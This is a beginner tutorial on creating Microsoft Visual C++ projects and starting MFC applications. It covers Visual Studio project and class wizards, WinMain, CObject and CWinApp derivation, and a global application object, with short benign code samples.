Images shown on the disp are search results from duckduckgo "cat" search, no preferences for whatever comes up there.
Attachments
Be the First to Share
Recommendations
23 Discussions
Question 5 months ago
Hi, i seem to have a problem after loading the screen content. There is a grey border appearing slowly and staying there. It also disrupts the screen content as seen on the picture. Do you think it is fixable somehow. It happened after running the waveshare code maybe three times on a new display and persists after adding some own code. I hope its not permanent damage like you mentioned in the video. Thank you very much!
1 year ago on Introduction
Ok I got this working with RPI Zero W without many modification, only PIL import line that was already mentioned. Thank you very much. A thing to note is that my screen has a bit of ghosting around the contrasting elements after some updates. Two flashes one white one brack clear the problem so it is not persistent.
One issue I see is that we could have solved is that it works with python 2.7 and not 3.x when some off new helper libraries I'd love to use in my sensor project are 3.x exclusive
-------------
Added a wiring diagram for my project, as the table on the main page is hard to read. Waveshare screen comes with the colorful leads. Valid until they change colors :) (uses other ground connector for better packing)
Reply 1 year ago
Hi MaciejE2, Don't suppose you still have the code for your project. I'd love to take a look at it, Attempting a similar project myself but with temp and pressure for a weather station.
Cheers
Question 1 year ago
Hi, I followed the instructions (step by step), but I get this Error (screenshot also included ):
EPD_Init
Reset is complete
disp size : 128x296
------------init and Clear full screen------------
1.init full screen
2.clear full screen
Traceback (most recent call last):
File "/home/pi/Schreibtisch/neu0/RaspberryPi/python1/main.py", line 95, in <module>
myfont10 = ImageFont.truetype("amiga_forever/amiga4ever.ttf", 8)
Any Idea what the problem could be?
Answer 1 year ago
Looks like the font is not found. It is searched under "amiga_forever" from your current path. Make sure you have that or make it an absolut path or copy the ttf file to /usr/share/fonts and remove the path in the code..
Cheers M.
Reply 1 year ago
Thanks this was very helpful :)
But now I've another problem : This time I get a number of x entries for every search but it takes everytime ages to continue with the next "search-word" and nothing is displayed on the ePaper-display
A screenshot is added (by the way i waited half an hour till I got to this point and it is still working with new "search results"/x entries poping up)
Reply 1 year ago
Any Idea ? The program got stuck in this continuos loop and the display seems not to be activated :( What could've gone wrong ?
Reply 1 year ago
Hard to say, try to comment in some of the print command at the end of main.py and find out where all the time goes.
Reply 1 year ago
I commented in the 'print drawtime, convtime and uploadtime' but I got the error "uploadtime not defined" so I added the line "uploadtime = time.time()" then this error disappeared but the program still got stuck emitting search results eternally (with the draw-,conv-,uploadtimes being printed now). The display still shows no Image.
Question 1 year ago on Introduction
I received a pdf file that may be of some help to you, but it's over my head (sadly that doesn't take much anymore). If you would like a copy please tell me how to get it to you.
Question 2 years ago on Introduction
In the EPD_driver.py file, where did you get the values for LUTDefault_full and LUTDefault_part? I'm trying to modify your code to drive the 7.5" Waveshare display, but I'm not seeing anything equivalent to that data in the original Waveshare code. I see that same data in a few different Github repos, but no explanation as to where it comes from. Thanks.
Answer 1 year ago
I am currently having the same issue.
Did you find any solution yet?
Reply 1 year ago
I don't believe I ever found an explanation for those two values, however I did get my display running by building off the code supplied by Waveshare. You can dig through my project on Github to see how I made it work:
Question 2 years ago on Introduction
Hey there, nice tutorial! I got myself a 2,7" waveshare HAT and wonder at which location you got the original EPD_Driver.py? My display seems to be not supported... that's not what I expected when buying a HAT for my Raspberry Pi3
Answer 2 years ago
Hi, The waveshare wiki has a page for each display there is a link to a demo zip file on this page.
Cheers, M.
Question 2 years ago
I'm having a python issue with the waveshare and this example.
I followed the instructions using the latest raspbian stretch, and installed python-pil
Traceback (most recent call last):
File "main.py", line 3, in <module>
import Image, ImageDraw, ImageFont # PIL - PythonImageLibrary
ImportError: No module named Image
Also tried to install pil and then pillow with pip, but no luck.
Anyone have the same issue?
Answer 2 years ago
In case anyone else wonders the same.
Seems like the problem with at least the waveshare example was that
"import Image" needed to be "from PIL import Image"
same for "ImageFont" and "ImageDraw" which also needed the "from PIL" part.
Question 2 years ago on Introduction
do you have full command list what i need to install etc. I have clean raspberry pi zero w with rasbian lite. i try earlier and error is no module named EPD_driver
Answer 2 years ago
Look for the attached zip file, this contains my code, main.py and the modified EPD_driver.py (original was from Waveshare download) Eventually your python does not look for lib files in the current directory -> ask your fav search engine.
2 years ago
Hi, it's difficult to "fix" the software without the hardware for testing it, It took me a some iterations to get mine running.
However, the docu of the 2.13 HAT says something about a "virtual width" of 128 instead of 122, meaning the display memory is 128 pixel width to keep the lines byte aligned.
Maybe a width setting of 128 does the trick.
Cheers. | https://www.instructables.com/id/Waveshare-EPaper-and-a-RaspberryPi/ | CC-MAIN-2020-29 | refinedweb | 2,235 | 66.74 |
An accurate natural language detection library, suitable for long and short text alike
Project description
1. What does this library.
2. Why does this library exist?
Language detection is often done as part of large machine learning frameworks or natural language processing applications. In cases where you don't need the full-fledged functionality of those systems or don't want to learn the ropes of those, a small flexible library comes in handy.
Python is widely used in natural language processing, so there are a couple of comprehensive open source libraries for this task, such as Google's CLD 2 and CLD 3, langid and langdetect. Unfortunately, except for the last one they have two major drawbacks:
- Detection only works with quite lengthy text fragments. For very short text snippets such as Twitter messages, they do not provide adequate results.
- The more languages take part in the decision process, the less accurate are the detection results.
Lingua aims at eliminating these problems. She nearly does not need any configuration and yields pretty accurate results on both long and short text, even on single words and phrases. She draws on both rule-based and statistical methods but does not use any dictionaries of words. She does not need a connection to any external API or service either. Once the library has been downloaded, it can be used completely offline.
3. Which languages are supported?
Compared to other language detection libraries, Lingua's focus is on quality over quantity, that is, getting detection right for a small set of languages first before adding new ones. Currently, the following 75 languages are supported:
- A
- Afrikaans
- Albanian
- Arabic
- Armenian
- Azerbaijani
- B
- Basque
- Belarusian
- Bengali
- Norwegian Bokmal
- Bosnian
- Bulgarian
- C
- Catalan
- Chinese
- Croatian
- Czech
- D
- Danish
- Dutch
- E
- Esperanto
- Estonian
- F
- Finnish
- G
- Ganda
- Georgian
- German
- Greek
- Gujarati
- H
- Hebrew
- Hindi
- Hungarian
- I
- Icelandic
- Indonesian
- Irish
- Italian
- J
- Japanese
- K
- Kazakh
- Korean
- L
- Latin
- Latvian
- Lithuanian
- M
- Macedonian
- Malay
- Maori
- Marathi
- Mongolian
- N
- Norwegian Nynorsk
- P
- Persian
- Polish
- Portuguese
- Punjabi
- R
- Romanian
- Russian
- S
- Serbian
- Shona
- Slovak
- Slovene
- Somali
- Sotho
- Spanish
- Swahili
- Swedish
- T
- Tagalog
- Tamil
- Telugu
- Thai
- Tsonga
- Tswana
- Turkish
- U
- Ukrainian
- Urdu
- V
- Vietnamese
- W
- Welsh
- X
- Xhosa
- Y
- Yoruba
- Z
- Zulu
4. How good is it?
Lingua is able to report accuracy statistics for some bundled test data available for each supported language. The test data for each language is split into three parts:
- a list of single words with a minimum length of 5 characters
- a list of word pairs with a minimum length of 10 characters
- a list of complete grammatical sentences of various lengths
Both the language models and the test data have been created from separate documents of the Wortschatz corpora offered by Leipzig University, Germany. Data crawled from various news websites have been used for training, each corpus comprising one million sentences. For testing, corpora made of arbitrarily chosen websites have been used, each comprising ten thousand sentences. From each test corpus, a random unsorted subset of 1000 single words, 1000 word pairs and 1000 sentences has been extracted, respectively.
Given the generated test data, I have compared the detection results of Lingua, langdetect, langid, CLD 2 and CLD 3 running over the data of Lingua's supported 75 languages. Languages that are not supported by the other detectors are simply ignored for them during the detection process.
The box plots below illustrate the distributions of the accuracy values for each classifier. The boxes themselves represent the areas which the middle 50 % of data lie within. Within the colored boxes, the horizontal lines mark the median of the distributions. All these plots demonstrate that Lingua clearly outperforms its contenders. Bar plots for each language can be found in the file ACCURACY_PLOTS.md. Detailed statistics including mean, median and standard deviation values for each language and classifier are available in the file ACCURACY_TABLE.md.
4.1 Single word detection
4.2 Word pair detection
4.3 Sentence detection
4.4 Average detection
5. Why is it better than other libraries?
Every language detector uses a probabilistic n-gram model trained on the character distribution in some training corpus. Most libraries only use n-grams of size 3 (trigrams) which is satisfactory for detecting the language of longer text fragments consisting of multiple sentences. For short phrases or single words, however, trigrams are not enough. The shorter the input text is, the less n-grams are available. The probabilities estimated from such few n-grams are not reliable. This is why Lingua makes use of n-grams of sizes 1 up to 5 which results in much more accurate prediction of the correct language.
A second important difference is that Lingua does not only use such a statistical model, but also a rule-based engine. This engine first determines the alphabet of the input text and searches for characters which are unique in one or more languages. If exactly one language can be reliably chosen this way, the statistical model is not necessary anymore. In any case, the rule-based engine filters out languages that do not satisfy the conditions of the input text. Only then, in a second step, the probabilistic n-gram model is taken into consideration. This makes sense because loading less language models means less memory consumption and better runtime performance.
In general, it is always a good idea to restrict the set of languages to be considered in the classification process using the respective api methods. If you know beforehand that certain languages are never to occur in an input text, do not let those take part in the classifcation process. The filtering mechanism of the rule-based engine is quite good, however, filtering based on your own knowledge of the input text is always preferable.
6. Test report generation
If you want to reproduce the accuracy results above, you can generate the test reports yourself for all classifiers and languages by executing:
poetry install --extras "langdetect langid gcld3 pycld2" poetry run python3 scripts/accuracy_reporter.py
For each detector and language, a test report file is then written into
/accuracy-reports.
As an example, here is the current output of the Lingua German report:
##### German ##### >>> Accuracy on average: 89.27% >> Detection of 1000 single words (average length: 9 chars) Accuracy: 74.20% Erroneously classified as Dutch: 2.30%, Danish: 2.20%, English: 2.20%, Latin: 1.80%, Bokmal: 1.60%, Italian: 1.30%, Basque: 1.20%, Esperanto: 1.20%, French: 1.20%, Swedish: 0.90%, Afrikaans: 0.70%, Finnish: 0.60%, Nynorsk: 0.60%, Portuguese: 0.60%, Yoruba: 0.60%, Sotho: 0.50%, Tsonga: 0.50%, Welsh: 0.50%, Estonian: 0.40%, Irish: 0.40%, Polish: 0.40%, Spanish: 0.40%, Tswana: 0.40%, Albanian: 0.30%, Icelandic: 0.30%, Tagalog: 0.30%, Bosnian: 0.20%, Catalan: 0.20%, Croatian: 0.20%, Indonesian: 0.20%, Lithuanian: 0.20%, Romanian: 0.20%, Swahili: 0.20%, Zulu: 0.20%, Latvian: 0.10%, Malay: 0.10%, Maori: 0.10%, Slovak: 0.10%, Slovene: 0.10%, Somali: 0.10%, Turkish: 0.10%, Xhosa: 0.10% >> Detection of 1000 word pairs (average length: 18 chars) Accuracy: 93.90% Erroneously classified as Dutch: 0.90%, Latin: 0.90%, English: 0.70%, Swedish: 0.60%, Danish: 0.50%, French: 0.40%, Bokmal: 0.30%, Irish: 0.20%, Tagalog: 0.20%, Tsonga: 0.20%, Afrikaans: 0.10%, Esperanto: 0.10%, Estonian: 0.10%, Finnish: 0.10%, Italian: 0.10%, Maori: 0.10%, Nynorsk: 0.10%, Somali: 0.10%, Swahili: 0.10%, Turkish: 0.10%, Welsh: 0.10%, Zulu: 0.10% >> Detection of 1000 sentences (average length: 111 chars) Accuracy: 99.70% Erroneously classified as Dutch: 0.20%, Latin: 0.10%
7. How to add it to your project?
Lingua is available in the Python Package Index and can be installed with:
pip install lingua-language-detector
8. How to build?
Lingua requires Python >= 3.7 and uses Poetry for packaging and dependency management. You need to install it first if you have not done so yet. Afterwards, clone the repository and install the project dependencies:
git clone cd lingua-py poetry install
The library makes uses of type annotations which allow for static type checking with Mypy. Run the following command for checking the types:
poetry run mypy
The source code is accompanied by an extensive unit test suite. To run the tests, simply say:
poetry run pytest
9. How to use?
9.1 Basic usage
>>> from lingua import Language, LanguageDetectorBuilder >>> languages = [Language.ENGLISH, Language.FRENCH, Language.GERMAN, Language.SPANISH] >>> detector = LanguageDetectorBuilder.from_languages(*languages).build() >>> detector.detect_language_of("languages are awesome") Language.ENGLISH
9.2 Minimum relative distance
By default, Lingua returns the most likely language for a given input text. However, there are certain words that are spelled the same in more than one language. The word prologue, for instance, is both a valid English and French word. Lingua would output either English or French which might be wrong in the given context. For cases like that, it is possible to specify a minimum relative distance that the logarithmized and summed up probabilities for each possible language have to satisfy. It can be stated in the following way:
>>> from lingua import Language, LanguageDetectorBuilder >>> languages = [Language.ENGLISH, Language.FRENCH, Language.GERMAN, Language.SPANISH] >>> detector = LanguageDetectorBuilder.from_languages(*languages)\ .with_minimum_relative_distance(0.25)\ .build() >>> print(detector.detect_language_of("languages are awesome")) None
Be aware that the distance between the language probabilities is dependent on
the length of the input text. The longer the input text, the larger the
distance between the languages. So if you want to classify very short text
phrases, do not set the minimum relative distance too high. Otherwise,
None
will be returned most of the time as in the example above. This is the return
value for cases where language detection is not reliably possible.
9.3 Confidence values
Knowing about the most likely language is nice but how reliable is the computed likelihood? And how less likely are the other examined languages in comparison to the most likely one? These questions can be answered as well:
>>> from lingua import Language, LanguageDetectorBuilder >>> languages = [Language.ENGLISH, Language.FRENCH, Language.GERMAN, Language.SPANISH] >>> detector = LanguageDetectorBuilder.from_languages(*languages).build() >>> confidence_values = detector.compute_language_confidence_values("languages are awesome") >>> for language, value in confidence_values: ... print(f"{language.name}: {value:.2f}") ENGLISH: 1.00 FRENCH: 0.79 GERMAN: 0.75 SPANISH: 0.70
In the example above, a list of all possible languages is returned, sorted by their confidence value in descending order. The values that the detector computes are part of a relative confidence metric, not of an absolute one. Each value is a number between 0.0 and 1.0. The most likely language is always returned with value 1.0. All other languages get values assigned which are lower than 1.0, denoting how less likely those languages are in comparison to the most likely language.
The list returned by this method does not necessarily contain all languages which this LanguageDetector instance was built from. If the rule-based engine decides that a specific language is truly impossible, then it will not be part of the returned list. Likewise, if no ngram probabilities can be found within the detector's languages for the given input text, the returned list will be empty. The confidence value for each language not being part of the returned list is assumed to be 0.0.
9.4 Eager loading versus lazy loading
By default, Lingua uses lazy-loading to load only those language models on demand which are considered relevant by the rule-based filter engine. For web services, for instance, it is rather beneficial to preload all language models into memory to avoid unexpected latency while waiting for the service response. If you want to enable the eager-loading mode, you can do it like this:
LanguageDetectorBuilder.from_all_languages().with_preloaded_language_models().build()
Multiple instances of
LanguageDetector share the same language models in
memory which are accessed asynchronously by the instances.
9.5 Methods to build the LanguageDetector
There might be classification tasks where you know beforehand that your language data is definitely not written in Latin, for instance. The detection accuracy can become better in such cases if you exclude certain languages from the decision process or just explicitly include relevant languages:
from lingua import LanguageDetectorBuilder, Language, IsoCode639_1, IsoCode639_3 # Including all languages available in the library # consumes approximately 3GB of memory and might # lead to slow runtime performance. LanguageDetectorBuilder.from_all_languages() # Include only languages that are not yet extinct (= currently excludes Latin). LanguageDetectorBuilder.from_all_spoken_languages() # Include only languages written with Cyrillic script. LanguageDetectorBuilder.from_all_languages_with_cyrillic_script() # Exclude only the Spanish language from the decision algorithm. LanguageDetectorBuilder.from_all_languages_without(Language.SPANISH) # Only decide between English and German. LanguageDetectorBuilder.from_languages(Language.ENGLISH, Language.GERMAN) # Select languages by ISO 639-1 code. LanguageDetectorBuilder.from_iso_codes_639_1(IsoCode639_1.EN, IsoCode639_1.DE) # Select languages by ISO 639-3 code. LanguageDetectorBuilder.from_iso_codes_639_3(IsoCode639_3.ENG, IsoCode639_3.DEU)
10. What's next for version 1.1.0?
Take a look at the planned issues.
11. Contributions
Any contributions to Lingua are very much appreciated. Please read the instructions
in
CONTRIBUTING.md
for how to add new languages to the library.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages. | https://pypi.org/project/lingua-language-detector/ | CC-MAIN-2022-27 | refinedweb | 2,212 | 52.05 |
Shader that gets data from an object: Refresh
- fwilleke80 last edited by
Hello,
I'm writing a channel shader. It has a LINK box where the user links an object from the scene. The object is also a plugin of mine. The shader gets some data from the object and renders it. It already works fine with editor and PV renders.
But here is a question:
When I change attributes of the object, I want the shader to update automatically. Currently, the editor/viewport representation of the shader only changes when I force it to update by eg. changing a shader attribute. Is there a standard way to either notify all instances of my shader if my plugin object changes; or can a shader somehow observe the linked object to detect changes?
Thanks in advance!
Cheers from Berlin,
Frank
Hi,
have tried the "standard hacky way " of evaluating the dirty state of the object node in question in
NodeData::Messageof your shader node?
I also am always completely at a loss again every time I encounter such scenario and what message to choose / piggy back on, because of the rather lacklustre documentation of the message system of Cinema. You would have to look at the message feed and choose an appropriate message id or just blanked in the evaluation if no message id alone seems sufficient. This solution is obviously not perfect, as it still might result in noticeable delays until the change of data is reflected in the viewport.
Cinema probably also needs at some point a modern event subscription / delegate logic system, because it is one of the most common problems here on the forum. The overhead of such system is not so bad on modern machines anymore that it would justify completely ignoring such feature.
Cheers,
zipit
I have had to do this a few times in the past. What I do is store a BaseLink to all the Shaders that are used on my Object. I register and deregister them in the SetDParameter methods of the Shader itself. IE the shader registerers itself with the objects it is added to. And when the shader is destroyed it unregisters itself from the object it is applied to. Then when the object needs the shader to update it goes through its list of shaders that are registered to it and sets its dirty flag. SetDirty(DIRTYFLAGS::ALL); This should work fine for you since you are also storing a link to the object in your shader itself, which is also required so it knows what to register and deregister itself to.
Hi @fwilleke80 unfortually I just come to confirm there is no real way or at least nothing that comes with Cinema 4D.
Your best bet is to implement as Kent suggested a kind of observable pattern.
Cheers,
Maxime.
- fwilleke80 last edited by fwilleke80
Thank you very much, I'll try that!
Cheers,
Frank
P.S.: There might be follow-up questions to this, but I'll mark this as SOLVED for now.
- fwilleke80 last edited by fwilleke80
It works like a charm!
Thank you again!
I was surprised at how little code was required.
Sharing is caring. In case anyone needs it, here's the code:
#include "ge_prepass.h" #include "c4d_general.h" #include "c4d_baselinkarray.h" #include "c4d_basedocument.h" /// /// \brief Registers observers and sends messages to them. /// class Observable { public: /// /// \brief Subscribes a new observer. /// /// \param[in] observer Pointer to an AtomGoal /// \param[in] doc The document that owns the AtomGoal /// /// \return A maxon error object if anything went wrong, otherwise maxon::OK /// maxon::Result<void> Subscribe(C4DAtomGoal *observer, BaseDocument *doc); /// /// \brief Unsubscribes an observer /// /// \param[in] observer Pointer to an AtomGoal that has previously been subscribed /// \param[in] doc The document that owns the AtomGoal /// void Unsubscribe(C4DAtomGoal *observer, BaseDocument *doc); /// /// \brief Sends a messages to all subscribed observers /// /// \param[in] type Message type /// \param[in] doc The document that owns the subscribed observers /// \param[in] data Optional message data /// void Message(Int32 type, BaseDocument *doc, void *data = nullptr) const; private: BaseLinkArray _observers; }; maxon::Result<void> Observable::Subscribe(C4DAtomGoal *observer, BaseDocument *doc) { if (!observer) return maxon::NullptrError(MAXON_SOURCE_LOCATION, "Observer must not be nullptr!"_s); // Check if this observer is already registered const Int32 observerIndex = _observers.Find(observer, doc); if (observerIndex != NOTOK) return maxon::OK; // Register new observer if (!_observers.Append(observer)) { return maxon::OutOfMemoryError(MAXON_SOURCE_LOCATION, "Failed to add observer to the list!"_s); } return maxon::OK; } void Observable::Unsubscribe(C4DAtomGoal *observer, BaseDocument *doc) { if (observer && doc) { const Int32 observerIndex = _observers.Find(observer, doc); if (observerIndex != NOTOK) { _observers.Remove(observerIndex); } } } void Observable::Message(Int32 type, BaseDocument *doc, void *data) const { for (Int32 i = 0; i < _observers.GetCount(); ++i) { C4DAtomGoal *atom = _observers.GetIndex(i, doc); if (atom) { atom->Message(type, data); } } } | https://plugincafe.maxon.net/topic/12823/shader-that-gets-data-from-an-object-refresh | CC-MAIN-2020-40 | refinedweb | 792 | 56.25 |
Odoo Help
Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps:
CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.
Where should I save a model wich inherits from another for adding fields?
Hi there,
My doubt is the following:
I want to add fields to the resource.resource model, so , as I learnt, I have to inherit from resource with the parameters set as below:
_name = 'resource.resource'
_inherit = 'resource.resource'
Then add the fields I want in the _columns parameter.
Until here everything is ok, but then I have some issues I don't know how to solve:
Where should I write the new class? Inside resource.py? or should I write a new .py (for example: resource2.py)
If I should write a new .py, where should I save it? Inside the resource folder? or in a custom folder? and besides, do I need some imports?
Any other recommendations are welcomed.
Thanks in advance
Code:
class resource_resource(osv.Model): _name = 'resource.resource' _inherit = 'resource.resource' _columns = { 'name' : fields.function(_get_full_name, type='text', 'Full Name'), 'x_name' : fields.text('Name'), 'x_sname' : fields.text('Surname'), } def _get_full_name(self,cr,uid,ids,field,arg,context=None): aResource = self.browse(cr,uid,ids) return (aResource.x_name + ' ' + aResource.x_sname)
Openerp version: 7
Hi, You can write in the same py file by creating different class. But its always good to write in new py file which is separated from the base module. Because when performing upgrade there is a chance that your code get deleted.
Thanks for the answer, I would like to create a new .py, Would it be ok if I locate it in a Resource-Custom folder created by myself? Shouldn't I make some imports?
You can create a custom module and add the extra fields in the py file of inherited class. Write the _view.xml file only for the field you have newly created and give the ref as <field name="inherit_id" ref="object.yourview" />
About This Community
Odoo Training Center
Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
Can u paste your code ?
Hi, I will edit my post with the code though my question is not about the code itself but more related to where should I put it. | https://www.odoo.com/forum/help-1/question/where-should-i-save-a-model-wich-inherits-from-another-for-adding-fields-49753 | CC-MAIN-2017-43 | refinedweb | 395 | 69.99 |
New Faster RubyMine 4.0 EAP is Ready for Download
Hello
15 Responses to New Faster RubyMine 4.0 EAP is Ready for Download
Sergei says:November 14, 2011
Is Ruby plugin updated as well?
Dennis Ushakov says:November 14, 2011
Sergei, we’ll publish updated plugin version in next couple of days, most probably tomorrow.
Xavier Noria says:November 14, 2011
Cool! How do you go to a class by full class name? I don’t see it in the Navigation menu, and Go to Class appears not to understand a namespace.
Dennis Ushakov says:November 14, 2011
Xavier, Go to Class should understand full class name, it may need more letters of actual class you are looking for due to filtering mechanism limitations (for example, AR::B is not enough, but AR::Bas is good)
Pawel Barcik says:November 14, 2011 ?? 🙂
KODer says:November 15, 2011
Very nice release!
Thanks for front-end improve.
Csaba says:November 15, 2011
Where did the alt+shift+n shortcut go? Supposed to be goto model/helper/view/test, now it does nothing. (mac osx) Disappeared from the menu as well.
Tatiana Vasilyeva says:November 16, 2011
Csaba, now it could be found in the menu Navigate->Related files (Ctrl+Alt+Home). We’re planning to get back Alt+Shift+N for that.
Csaba says:November 18, 2011
Thanks Tatiana!
Daniele Mazzini says:November 23, 2011
I use that binding all the time, couldn’t you set an easier key combination? Or – can I configure that myself? Thanks!
Tatiana Vasilyeva says:November 23, 2011
Daniele, you can configure it yourself in Settings | Keymap. Just find the action Main menu->Navigate->Related File and add your own shortcut or change an existing one.
Bill says:November 22, 2011
Praise allah! This is exactly the update I’ve been waiting for…you’ve already got a great product, except for the fact it was difficult to bear the slowness on our enormous project. Thanks for listening.
Gerhard says:November 23, 2011
Artem Chernikov says:November 25, 2011
Maybe only in my case, but TAB button make wrong indentation (double sized).
Tatiana Vasilyeva says:November 25, 2011
Artem,
Could you please create an issue at the RubyMine issue tracker and specify for what files it occurs. | https://blog.jetbrains.com/ruby/2011/11/new-faster-rubymine-4-0-eap-is-ready-for-download/ | CC-MAIN-2021-25 | refinedweb | 381 | 74.49 |
Introduction to MFC Applications
Visual C++ Projects and Files
Creating a New Project
Microsoft Visual C++ allows you to create various types
of projects ranging from console applications to complex libraries, from
Win32 applications to communications modules or multimedia assignments.
Various options are available to create a project:
Any of these actions would display the New Project
dialog box from where you can select the type of project you want.
Practical
Learning: Creating a Microsoft Visual C++ Project
Creating a File
Although the most popular files used in Microsoft
Visual C++ are header and source files, this IDE allows you to create
various other types of files that are not natively C++ types.
To create a file, if a project is currently opened:
Adding Existing Files to a Project
If a file had already been created and exists on a
separate folder, drive, directory or project, you can import it and add it
to your application. When you decide to add an existing file to a project,
because Microsoft Visual Studio allows you a great level of flexibility on
the types of files you can add, it is your responsibility to check that
the file is valid.
If you copy a file from somewhere and paste it in the
folder that contains your project, the file is still not considered as
part of the project. You must explicitly add it. Before adding an existing
file to your project:
Any of these actions would open the Add Existing Item
dialog box. This requires you to locate the item and select it. Once the
item is ready, to add it to the project, click the Open button. If you
want to open it first, click the arrow of the Open button and specify how
you want to open the file.
Adding Classes
To add a class to your project, you have various
options. You can separately create a header file then create a source
file. You can also import an existing header file and a source file from
any valid path. Microsoft Visual C++ makes it easy to create a C++ class.
When doing this, a header and a source files are prepared. A (default)
constructor and a destructor are added. You can delete or completely
change the supplied constructor and/or the destructor. Also, Microsoft
Visual C++ includes the name of the header file in the source file so you
would not have forgotten to do this. Most classes in Microsoft Visual C++
have their names starting with the letter C. Although this is only a
suggestion, and any valid class name would work fine, to keep some
harmony, in our lessons, we will follow this convention.
To create a new class and add it to your project:
Any of these actions would open the New Class dialog
box. From there, you can specify the type of class you want to create and
click Open. You will then be asked to provide a name for the class.
Opening Files
To open a file:
If you had previously created or opened a file,
Microsoft Visual C++ keeps a list of the most recently used (MRU) files
under the File menu. To control the maximum number of files that can be
listed, on the mein menu, click Tools -> Options. In the left list of the
Options dialog box, click Environment and click General:
After specifying the desired value, click OK.
Opening Existing Projects
A project is made of various files and subject to the
environment in which it was created. A project itself is a file but it is
used to "connect"Â all the other files that compose its particular
application.
There is a limit on the types of projects you can open
in Microsoft Visual Studio. This is not an anomaly. Every
computer-programming project is created using a particular environment and
each environment configures and arranges its project as its judges it
necessary. Any attempt to open an unrecognizable project would produce an
error.
Microsoft Visual Studio is configured to easily open
various types of projects. To open a project:
Introduction to the Microsoft Foundation
Class Library
Introduction to Win32
Win32 is a library made of data types, variables,
constants, functions, and classes (mostly structures) that can be used to
create applications for the Microsoft Windows family of operating systems.
A typical application is made of at least two objects: a control and a
host object on which the control is positioned.
To create a Win32 application using Microsoft Visual
C++:
Any of these actions would display the New Project
dialog box. From there, select Win32 Project item.
Just like a C++ program always has a main()
function, a Win32 program uses a central function called WinMain.
The syntax of that function is:
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow );
To support international characters, Microsoft Windows
provides another version of this function named _tWinMain.
This version uses the same syntax (same arguments) as the first.
Unlike the C++'s main() function, the arguments
of the WinMain() function are not optional. Your program will need
them to communicate with the operating system. Here is an example of
starting a program with the WinMain() function:
#include <windows.h>
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow )
{
return 0;
}
Introduction to MFC
The Microsoft Foundation Class (MFC) library provides
a set of functions, constants, data types, and classes to simplify
creating applications for the Microsoft Windows family of operating
systems.
Practical
Learning: Starting an MFC Application
CObject, the Ancestor of All/Most MFC Classes
To implement its functionality, the MFC is organized
as a hierarchical tree of classes, the ancestor of which is
CObject:
Although you can create C++ classes for your
applications, most of the classes you will use throughout our lessons
descend directly or indirectly from CObject.
The CObject class lays a valuable
foundation that other classes can build on. Using the rules of
inheritance, the functionality of CObject can be
transparently applied to other classes as we will learn little by little.
Some of the features that CObject provides are:
You will hardly use CObject directly
in your program. Instead, you may create your own classes that are based
on CObject. Here is an example:
class CCar : public CObject
{
public:
CCar();
char *Make;
char *Model;
int Year;
long Mileage;
int Doors;
double Price;
};
Practical
Learning: Supporting MFC
CObject Methods
When inheriting a class from CObject,
your class can take advantage of the features of its parent
CObject. This means that you will have available the
functionality laid by its methods. Some of the methods of the
CObject class are:
The objects of an application send messages to the
operating system to specify what they want. The MFC library provides a
special class to manage these many messages. The class is called
CCmdTarget. We will come back to it when dealing with messages.
A Basic Application
To create a program, also called an application, you
derive a class from the MFC's CWinApp class. The
CWinApp class is derived from the CWinThread
class. CWinThread is derived from a class named CCmdTarget,
which is derived from CObject. CWinApp stands for
Class For A Windows Application:
Creating and Managing Classes in Microsoft
Visual Studio
Creating Header and Source Files
One of the most regular actions you perform when working
on a project consists of creating classes. Microsoft Visual Studio provides
various means and tools to assist you with this.
From your knowledge of C++, you can create a class in
different files: a header file and a source file. To create any of these:
Any of these actions would open the Add New Item dialog
box. In the Installed Templates list, click Code. Then,
After naming the file, click Add.
After generating the files, you can use them following
rules and suggestions of the C++ language. For example, you can create the
layout of a class in the header file and define it in the source file.
Creating a Class
As you know from your knowledge of C++, you can create a
stand-alone class or derive one from another existing class. Microsoft
Visual Studio provides all the necessary tools to visually create or derive
a class. To create a class:
Any of these actions would open the Add Class dialog
box:
Make sure C++ Class is selected and click Add. This
would open the Generic C++ Class Wizard. The wizard presents many options:
Once you are ready, click Finish. If you specified that
you are deriving a class, when you click Finish, the wizard would look for
the base class, first in the current project, then in the libraries (if any)
referenced in the project. If the wizard doesn't find the parent class, it
would display a message box. Here is an example:
If know for sure that the class exists or you will
create it later, click Yes. If you click, you will be given the opportunity
of rectifying.
Here is an example of deriving a class from
CWinApp:
class CSimpleApp : public CWinApp
{
};
Because the CWinApp class is defined in
the AFXWIN.H header file, make sure you include that file where
CWinApp is being used.
Practical
Learning: Creating a CWinApp-Based Class
#include <afxwin.h>
class CExerciseApp : public CWinApp
{
};
Managing the Member Variables of a Class
After creating a class, you can manage it. Microsoft
Visual C++ provides various tools to assist you. Managing a class consists
of accessing its file(s), adding member variables, and adding methods.
The Microsoft Foundation Class Library
The Framework
Instead of creating an application using "raw" Win32
classes and functions, the MFC library simplifies this process by providing
a mechanism called the framework. The framework is a set of classes,
functions, and techniques used to create an application as complete as
possible with as few lines of code as possible. To provide all this
functionality, the framework works behind the scenes with the CWinApp
class to gather the necessary MFC classes and functions, to recognize and
reconcile the Win32 classes that the application needs. This reconciliation
is also made possible by a set of global functions. These functions have
names that start with Afx... Some of these functions are:
We will come back to some of these functions and we will
see many other MFC macros in later lessons.
A Global Application Object
To make your application class available and accessible
to the objects of your application, you must declare a global variable from
it and there must be only one variable of your application. This variable is
of the type of the class derived from CWinApp. Here is an example:
class CSimpleApp : public CWinApp
{
};
CSimpleApp MyApplication;
As you can see, you can name this global variable
anything you want. By tradition, in Microsoft Visual C++, this variable is
named theApp. Here is an example:
CSimpleApp theApp;
To get a pointer to this variable from anywhere in your
application, call the AfxGetApp() framework function. Its syntax is:
CWinApp* AfxGetApp();
To implement the role of the Win32's WinMain()
function, the framework uses its own implementation of this function and the
MFC provides it as AfxWinInit(). It is declared as follows:
BOOL AFXAPI AfxWinInit(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow);
As you can see, the Win32's WinMain() and the
MFC's AfxWinInit() functions use the same arguments.
Practical
Learning: Creating a Global Object
#include <afxwin.h>
class CExerciseApp : public CWinApp
{
};
CExerciseApp theApp;
